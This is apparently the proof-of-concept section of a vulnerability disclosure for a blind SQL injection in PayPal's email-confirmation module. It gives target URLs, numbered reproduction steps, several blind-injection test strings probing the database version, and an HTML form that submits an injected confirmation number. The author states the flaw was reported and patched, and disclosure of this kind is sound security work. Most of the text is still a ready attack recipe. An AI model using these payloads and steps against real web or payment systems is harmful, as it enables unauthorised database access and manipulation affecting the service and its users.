Proof of Concept:
=================
The blind sql injection vulnerability can be exploited by remote attackers with low privileged application user account and 
without required user interaction. For demonstration or reproduce ...

URL1: Request a Session with 2 different mails (Step1)
https://www.paypal.com/de/ece/cn=06021484023174514599&em=admin@vulnerabiliuty-lab.com
https://www.paypal.com/de/ece/cn=06021484023174514599&em=01x445@gmail.com

URL2: Injection into ID Confirm Field (Step2)
https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-password-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846

1. Open the website of paypal and login as standard user with a restricted account
2. Switch to the webscr > Confirm Email module of the application
3. Request a login confirm id when processing to load a reset
4. Take the valid confirm number of the mail and insert it into the email confirm number verification module input fields
5. Switch to the last char of the valid confirm number in the input field and inject own sql commands as check to proof the validation

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the id -1+sql-query to proof for blind injections in the input field 
8. The bottom bar gets loaded as result for the successful executed sql query
8. Now, the remote attacker can manipulate the paypal core database with a valid confirm number + his own sql commands

Bug Type: 	Blind SQL INJECTION [POST] Injection Vulnerability
SESSION: 	DE - 22:50 -23:15 (paypal.com)
Browser: 	Mozilla Firefox 14.01

PoC:
<form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846" class="">
<p class="group"><label for="login_confirm_number_id"><span class="labelText"><span class="error">
Please enter it here</span></span></label><span class="field"><input id="login_confirm_number_id" class="xlarge" 
name="login_confirm_number" value="06021484023174514599-1+[BLIND SQL-INJECTION!]--" type="text"></span></p><p class="buttons">
<input name="confirm.x" value="Confirm" class="button primary" type="submit"></p><input name="form_charset" 
value="UTF-8" type="hidden"></form>

Note: Do all requests ever with id to reproduce the issue. (-) is not possible as first char of the input request. 

Example(Wrong): -1+[SQL-Injection]&06021484023183514599
Example(Right): 06021484023183514599-1+[SQL-Injection]--
Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--

Note:
After inject was successful 2 times because of my check, the paypal website opened a security issue report message box as exception-handling. 
I included the details and information of my test and explained the issue and short time later it has been patched.